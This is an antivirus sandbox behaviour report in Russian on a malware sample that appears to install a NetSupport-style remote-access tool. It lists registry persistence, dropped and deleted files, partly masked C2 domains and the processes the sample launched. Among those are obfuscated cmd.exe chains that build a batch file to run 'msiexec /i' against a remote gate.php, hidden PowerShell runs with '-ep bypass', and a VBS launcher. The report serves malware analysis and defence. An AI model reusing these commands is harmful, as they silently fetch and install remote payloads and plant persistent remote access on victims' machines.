Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'fonthost' = '%APPDATA%\nY8Hj7su\fonthost.exe'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\raber.bat&EcHo|s^et /p="c " >>%temp%\raber.bat&EcHo|s^et /p="^/i" >>%temp%\raber.bat&EcHo|s^et /p=" http^:^/^/^brauman.net/gate.php ">>%temp%\raber.bat&EcH...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\raber.bat
- %APPDATA%\ny8hj7su\pcicl32.dll
- %APPDATA%\ny8hj7su\pcichek.dll
- %APPDATA%\ny8hj7su\pcicapi.dll
- %APPDATA%\ny8hj7su\nsm.lic
- %APPDATA%\ny8hj7su\nsm.ini
- %APPDATA%\ny8hj7su\nskbfltr.inf
- %APPDATA%\ny8hj7su\msvcr100.dll
- %APPDATA%\ny8hj7su\htctl32.dll
- %APPDATA%\ny8hj7su\client32.ini
- %APPDATA%\ny8hj7su\fonthost.exe
- %HOMEPATH%\downloads\bnhwtqxgei.vbs
- %TEMP%\nsfeb4.tmp\system.dll
- %TEMP%\iniconfbnhwtqxgei.ps1
- %TEMP%\nsfeb4.tmp\blowfish.dll
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files\$dpx$.tmp\f101f4c3f27aad418f1b34be0a6b9830.tmp
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files.cab
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\msiwrapper.ini
- %APPDATA%\ny8hj7su\remcmdstub.exe
- %APPDATA%\ny8hj7su\directx.dll
Удаляет следующие файлы
- %TEMP%\nsfeb4.tmp\blowfish.dll
- %TEMP%\nsfeb4.tmp\system.dll
- %HOMEPATH%\downloads\bnhwtqxgei.vbs
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files\signed_gate6.exe
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\msiwrapper.ini
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files.cab
Перемещает следующие файлы
- %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files\$dpx$.tmp\f101f4c3f27aad418f1b34be0a6b9830.tmp в %TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files\signed_gate6.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://br##man.net/gate.php
- http://ge#.####upportsoftware.com/location/loca.asp
UDP
- DNS ASK br##man.net
- DNS ASK af###dfa33.xyz
- DNS ASK fo###sfonts.com
- DNS ASK ge#.####upportsoftware.com
- DNS ASK du###battt.xyz
Другое
Ищет следующие окна
- ClassName: 'NSMWClass' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\mw-bca662f8-9d6e-47d5-9163-be749bcaeed5\files\signed_gate6.exe'
- '%WINDIR%\syswow64\wscript.exe' %HOMEPATH%\downloads\BNHWTQXGEI.vbs
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1
- '%APPDATA%\ny8hj7su\fonthost.exe'
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\raber.bat&EcHo|s^et /p="c " >>%temp%\raber.bat&EcHo|s^et /p="^/i" >>%temp%\raber.bat&EcHo|s^et /p=" http^:^/^/^brauman.net/gate.php ">>%temp%\raber.bat&EcH...' (со скрытым окном)
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ec^ho CreateObject("Wscript.Shell").Run "cmd /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1", 0, False > %userprofile%\downloads\BNHWTQXGEI.vb^s& wscript %userprofile...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '%WINDIR%\syswow64\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d %APPDATA%\nY8Hj7su\fonthost.exe /f
- '%WINDIR%\syswow64\msiexec.exe' /i http://af###dfa33.xyz/iplog/newg.php?hs######################### /q
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q "%TEMP%\MW-bca662f8-9d6e-47d5-9163-be749bcaeed5\files"
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1
- '%WINDIR%\syswow64\cmd.exe' /c cmd /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1
- '%WINDIR%\syswow64\cmd.exe' /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1
- '%WINDIR%\syswow64\msiexec.exe' /i http://af###dfa33.xyz/iplog/newg.php?hs######################## /q
- '<SYSTEM32>\cmd.exe' /c ec^ho CreateObject("Wscript.Shell").Run "cmd /c cmd /c cmd /c powershell -ep bypass -f %TEMP%\iniconfBNHWTQXGEI.ps1", 0, False > %userprofile%\downloads\BNHWTQXGEI.vb^s& wscript %userprofile...
- '<SYSTEM32>\msiexec.exe' /ihttp://br##man.net/gate.php /q
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\raber.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^brauman.net/gate.php " 1>>%TEMP%\raber.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\raber.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\raber.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\raber.bat"
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '%WINDIR%\syswow64\rundll32.exe' %APPDATA%\nY8Hj7su\directx.DLL, seed
